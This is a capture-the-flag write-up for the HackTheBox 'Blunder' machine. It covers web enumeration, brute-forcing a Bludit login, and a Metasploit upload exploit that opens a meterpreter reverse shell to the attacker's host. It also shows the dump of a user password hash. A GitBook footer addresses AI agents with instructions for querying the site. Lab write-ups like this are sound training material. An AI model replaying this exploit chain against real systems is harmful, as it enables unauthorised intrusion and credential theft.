# Blunder ## Enumeration ### nmap ``` $ nmap -sC -sV -oN nmap.txt 10.10.10.191 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 21:56 BST Nmap scan report for 10.10.10.191 Host is up (0.066s latency). Not shown: 998 filtered ports PORT STATE SERVICE VERSION 21/tcp closed ftp 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-generator: Blunder |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Blunder | A blunder of interesting facts Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.28 seconds ``` {% hint style="info" %} Apache httpd 2.4.41 {% endhint %} ### dirsearch ``` $ ./dirsearch.py -u 10.10.10.191 -e * 21:28:51] 200 - 7KB - /0 [21:28:56] 200 - 3KB - /about [21:28:58] 301 - 0B - /admin -> http://10.10.10.191/admin/ [21:29:00] 200 - 2KB - /admin/ [21:29:00] 200 - 2KB - /admin/.config [21:29:00] 200 - 2KB - /admin/?/login ... ... ... [21:29:03] 200 - 2KB - /admin/web/ [21:29:03] 200 - 2KB - /admin/user_count.txt [21:29:03] 200 - 2KB - /admin/uploads.php [21:29:31] 301 - 0B - /domcfg.nsf/?open -> http://10.10.10.191/domcfg.nsf [21:29:42] 200 - 30B - /install.php [21:29:45] 200 - 1KB - /LICENSE [21:30:03] 200 - 3KB - /README.md [21:30:04] 200 - 22B - /robots.txt ``` ### wfuzz ``` wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://10.10.10.191/FUZZ.txt" -t 100 =================================================================== ID Response Lines Word Chars Payload =================================================================== 000003519: 200 1 L 4 W 22 Ch "robots" 000004125: 200 4 L 23 W 118 Ch "todo" ``` ### ![](/files/-MEt4abA3LmXQmiDMPmQ) ### ![](/files/-MEt4kodE9yE2sQWc5Oj) {% hint style="success" %} Potential username: fergus {% endhint %} After some extensive enumeration, the only usefull information found was the "todo.txt" file which contains a possible username ("fergus"). ### Creating wordlist with cewl `$ cewl -w wordlists.txt -d 10 -m 1 10.10.10.191/` ### Bruteforcing login cred ![](/files/-MEtDGMmxI7GX_oCzQGQ) ## Exploitation ### Metasploit ``` $ msf5 > use exploit/linux/http/bludit_upload_images_exec [*] No payload configured, defaulting to php/meterpreter/reverse_tcp msf5 exploit(linux/http/bludit_upload_images_exec) > show options Module options (exploit/linux/http/bludit_upload_images_exec): Name Current Setting Required Description ---- --------------- -------- ----------- BLUDITPASS yes The password for Bludit BLUDITUSER yes The username for Bludit Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The base path for Bludit VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.17.168 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Bludit v3.9.2 msf5 exploit(linux/http/bludit_upload_images_exec) > set rhosts 10.10.10.191 rhosts => 10.10.10.191 msf5 exploit(linux/http/bludit_upload_images_exec) > set bludituser fergus bludituser => fergus msf5 exploit(linux/http/bludit_upload_images_exec) > set bluditpass RolandDeschain bluditpass => RolandDeschain msf5 exploit(linux/http/bludit_upload_images_exec) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf5 exploit(linux/http/bludit_upload_images_exec) > set lhost 10.10.14.189 lhost => 10.10.14.189 msf5 exploit(linux/http/bludit_upload_images_exec) > run [*] Started reverse TCP handler on 10.10.14.189:4444 [+] Logged in as: fergus [*] Retrieving UUID... [*] Uploading BamMBogTOe.png... [*] Uploading .htaccess... [*] Executing BamMBogTOe.png... [*] Sending stage (38288 bytes) to 10.10.10.191 [*] Meterpreter session 1 opened (10.10.14.189:4444 -> 10.10.10.191:43256) at 2020-08-16 22:46:40 +0100 [+] Deleted .htaccess meterpreter > ls Listing: /var/www/bludit-3.9.2/bl-content/tmp ============================================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40755/rwxr-xr-x 4096 dir 2020-08-16 22:52:22 +0100 thumbnails meterpreter > cd /home meterpreter > ls Listing: /home ============== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40755/rwxr-xr-x 4096 dir 2020-05-26 09:29:29 +0100 hugo 40755/rwxr-xr-x 4096 dir 2020-04-28 12:13:35 +0100 shaun ``` ## PivEsc ``` $ meterpreter > shell Process 3417 created. Channel 0 created. id uid=33(www-data) gid=33(www-data) groups=33(www-data) whoami www-data python -c "import pty;pty.spawn('/bin/bash')" $ www-data@blunder:/$ ls ls bin dev home lib64 media proc sbin sys var boot etc lib libx32 mnt root snap tmp cdrom ftp lib32 lost+found opt run srv usr $ www-data@blunder:/$ cd var cd var $ www-data@blunder:/var$ ls ls backups crash local log metrics run spool www cache lib lock mail opt snap tmp $ www-data@blunder:/var$ cd www cd www $ www-data@blunder:/var/www$ ls ls bludit-3.10.0a bludit-3.9.2 html $ www-data@blunder:/var/www$ cd bludit-3.10.0a cd bludit-3.10.0a $ www-data@blunder:/var/www/bludit-3.10.0a$ ls ls LICENSE bl-content bl-languages bl-themes install.php README.md bl-kernel bl-plugins index.php $ www-data@blunder:/var/www/bludit-3.10.0a$ cd bl-content cd bl-content $ www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ ls ls databases pages tmp uploads workspaces $ www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ cd databases cd databases $ www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ ls ls categories.php plugins site.php tags.php pages.php security.php syslog.php users.php $ www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php cat users.php { "admin": { "nickname": "Hugo", "firstName": "Hugo", "lastName": "", "role": "User", "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d", "email": "", "registered": "2019-11-27 07:40:55", "tokenRemember": "", "tokenAuth": "b380cb62057e9da47afce66b4615107d", "tokenAuthTTL": "2009-03-15 14:00", "twitter": "", "facebook": "", "instagram": "", "codepen": "", "linkedin": "", "github": "", "gitlab": ""} } www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ ``` {% hint style="info" %} User: Hugo\ Pass: faca404fd5c0a31cf1897b823c695c85cffeb98d {% endhint %} ![](/files/-MEtGKPiFu5RG3L0eRp0) ![](/files/-MEtGW1DC33WswmXDGQQ) ### Getting user.txt ![](/files/-MEtH-woJZnxlAhdOi1M) ### Getting root.txt ![](/files/-MEtHYxSTijoUyXFUDD6) {% embed url="" %} ![](/files/-MEtHkxV0a979Ht4TO5B) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://666isildur.gitbook.io/ethical-hacking/hackthebox/active/blunder.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.